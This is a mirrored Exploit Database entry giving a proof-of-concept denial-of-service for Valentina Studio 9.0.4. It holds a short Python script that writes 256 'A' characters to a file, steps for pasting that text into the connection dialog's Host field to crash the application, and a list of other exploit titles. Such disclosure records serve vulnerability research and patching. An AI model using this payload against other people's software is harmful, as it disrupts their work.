Valentina Studio 9.0.4 – ‘Host’ Denial of Service (PoC)

Exploit Database
16 阅读

作者： Victor Mondragón

日期： 2019-02-19
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46421/

#Exploit Title: Valentina Studio 9.0.4 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-19
#Vendor Homepage: https://valentina-db.com/en/
#Software Link: https://valentina-db.com/en/developer/database/download-valentina-database-adk
#Tested Version: 9.0.4
#Tested on: Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: Valentina_Studio_9.0.4.py
#2.- Open valentina.txt and copy content to clipboard
#3.- Open Valentina Studio
#4.- Select "File" > "Connect to"
#5.- Select "Valentina Server"
#6.- Select "Host" and Paste Clipboard
#7.- Crashed

cod = "\x41" * 256

f = open('valentina.txt', 'w')
f.write(cod)
f.close()

last Exploits
Valentina Studio 9.0.4 – ‘Host’ Denial of Service (PoC)的更多信息

PHP 5.3.3/5.2.14 – ZipArchive::getArchiveComment Null Pointer Dereference：
Moxa SoftCMS 1.5 – Denial of Service (PoC)：
Linux Kernel 2.6.x – KVM ‘pit_ioport_read()’ Local Denial of Service：
XWorm Trojan 2.1 – Null Pointer Derefernce DoS：
Sybase Advantage Data Architect – ‘.SQL’ Format Heap Overflow：
Microsoft Internet Explorer 11 – ‘jscript!JSONStringifyObject’ Use-After-Free：
IncrediMail – ‘ImShExtU.dll’ ActiveX Memory Corruption：
NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities：